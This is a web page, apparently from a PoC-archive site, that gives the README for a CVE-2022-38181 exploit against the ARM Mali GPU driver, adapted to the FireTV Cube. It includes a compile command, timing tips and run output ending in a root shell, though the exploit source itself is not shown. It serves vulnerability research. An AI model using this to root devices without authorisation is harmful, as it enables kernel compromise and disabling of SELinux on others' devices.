Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-38181 PoC — ARM Mali GPU Kernel Driver 资源管理错误漏洞

Source
Associated Vulnerability
Title:ARM Mali GPU Kernel Driver 资源管理错误漏洞 (CVE-2022-38181)
Description:ARM Mali GPU Kernel Driver是英国ARM公司的一个图形处理器单元的驱动程序。 ARM Mali GPU Kernel Driver 存在资源管理错误漏洞,该漏洞源于允许非特权用户进行不当的GPU处理操作,以获得对已释放内存的访问。
Description
CVE-2022-38181 POC for FireTV 3rd gen Cube (gazelle)
Readme
## Exploit for CVE-2022-38181 to run on FireTV 3rd gen Cube

This is a fork of security researcher Man Yue Mo's <a href="https://github.com/github/securitylab/tree/main/SecurityExploits/Android/Mali/CVE_2022_38181">Pixel 6 POC</a> for CVE_2022_38181.  Read his detailed write-up of the vulnerability <a href="https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug/">here</a>.  Changes have been made to account for FireOS's 32bit userspace. The POC exploits a bug in the ARM Mali kernel driver to gain arbitrary kernel code execution, which is then used to disable SELinux and gain root.  

I used the following command to compile with clang in ndk-21:
```
android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi30-clang -DSHELL mali_shrinker_mmap32.c -o gazelle_shrinker
```
The exploit should be run 30-90sec after the Cube boots for greatest reliability.
```
gazelle:/ $ /data/local/tmp/gazelle_shrinker
fingerprint: Amazon/gazelle/gazelle:9/PS7613.3701N/0025401652480:user/amz-p,release-keys
failed, retry.
failed, retry.
region freed 47
alias gpu va 100c83000
read 0
cleanup flush region
release_mem_pool
jit_freed
jit_free commit: 6 0
Found freed_idx 6
Found pgd 23, 100d30000
overwrite addr : 104100558 558
overwrite addr : 104300558 558
overwrite addr : 10410082c 82c
overwrite addr : 10430082c 82c
result 50
gazelle:/ # 
```
File Snapshot

[4.0K] /data/pocs/d6580e0c9e974372b8137c269ad234c45aed1fce ├── [ 50K] mali_base_jm_kernel.h ├── [ 32K] mali.h ├── [ 26K] mali_shrinker_mmap32.c ├── [ 11K] midgard.h └── [1.4K] README.md 0 directories, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.